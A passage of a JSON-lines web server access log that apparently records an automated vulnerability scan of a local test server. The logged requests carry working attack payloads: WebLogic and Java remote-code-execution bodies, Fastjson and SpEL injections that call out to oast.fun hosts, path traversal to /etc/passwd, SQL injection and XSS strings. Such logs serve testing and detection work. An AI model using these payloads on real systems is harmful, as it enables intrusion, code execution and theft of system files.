+0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c9v8h8gsmpv8c1qg07h0aifzr8m4zz3ki.oast.fun%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8h88smpv8c1ig07h0zcyxk95texoz7.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loadtextfile.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/77 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_/.ssh/authorized_keys HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 